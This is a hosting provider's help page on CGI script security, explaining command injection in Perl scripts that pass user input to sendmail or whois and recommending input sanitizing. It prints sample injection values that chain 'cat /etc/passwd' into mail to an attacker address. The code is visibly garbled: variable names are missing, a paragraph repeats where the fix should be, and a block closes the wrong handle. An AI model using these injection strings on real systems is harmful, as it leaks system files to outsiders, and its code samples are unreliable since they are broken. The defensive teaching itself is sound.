GSP
Quick Navigator

Search Site

Unix VPS
A - Starter
B - Basic
C - Preferred
D - Commercial
MPS - Dedicated
Previous VPSs
* Sign Up! *

Support
Contact Us
Online Help
Handbooks
Domain Status
Man Pages

FAQ
Virtual Servers
Pricing
Billing
Technical

Network
Facilities
Connectivity
Topology Map

Miscellaneous
Server Agreement
Year 2038
Credits
 

USA Flag

 

 

CGI Security

bullet Introduction
A common problem with contributed or free CGI scripts allows an attacker to execute arbitrary shell commands on your Virtual Private Servers with all of the privileges as you would have at a command prompt (such as when you Telnet or SSH to your Virtual Private Servers). It may then be possible for the attacker to gain privileged access to your Virtual Private Servers. The problem lies inherently in how the scripts are written not with the overall security of the Virtual Private Servers itself.

We strongly advises you to check all scripts you download free from a third party source.

You should specifically look for instances where the script opens a file handle to an external program such as a mail executable (a common task). When these file handles are opened using user-supplied data, you should ensure that these data have been properly "sanitized".

 

bullet Vulnerabilities
For example, you may have a script which packages user-supplied data and e-mails it to a recipient. Perhaps it looks something like:

open (MAIL, "|/bin/sendmail ");
print MAIL "To: 
";
print MAIL "From: 
";
.
.
.
close(MAIL);

The above code could possibly be prone to an attack. This would be accomplished by submitting for the value of "recipient" something like the following:

some@email.address; cat /etc/passwd | mail attacker@email.address
some@email.address && mail attacker@email.address < /etc/passwd

The easiest way to deny an attack in this particular example is to eliminate user-supplied data from the open command. The sendmail program has a very useful flag, -t, which when set forces sendmail to read the message headers (To:, Cc:, Bcc:) for recipients. So instead of:

open (MAIL, "|/bin/sendmail ");

The above code could possibly be prone to an attack. This would be accomplished by submitting for the value of "domain_name" something like the following:

domain.name; cat /etc/passwd | mail attacker@email.address
domain.name && mail attacker@email.address < /etc/passwd

 

bullet Sanitizing Input
The best way to prevent these types of attacks from being successful is to "sanitize" user-supplied data. Sanitizing user-supplied data is the process of eliminating any nonessential characters. So, in the example above, it would be very wise to check the "domain_name" against a valid character set which includes letters, digits, dashes, and periods. This can be accomplished using just a few lines of Perl code:
if ( =~ /[^A-Za-z0-9.-]/) {
  print "Content-type: text/plain

";
  print "Uh... you entered an invalid domain name.";
  exit(0);
}
open (WHOIS, "/bin/whois  |");
.
.
.
close(MAIL);

All of the scripts in our CGI Library use proper security sanitizing methods. Although we cannot guarantee the security of all other Virtual Private Servers add-ons, we have examined and corrected some problems we have encountered. We also pay close attention to CERT advisories and bulletins that have applicability to our Virtual Private Servers System.

 

bullet Other Resources
More information about proper CGI security is presented (including examples of specific programming techniques) at the following URLs:


Toll Free 1-866-GSP-4400 • 1-301-464-9363 • service@gsp.com
Copyright © 1994-2016 GSP Services, Inc.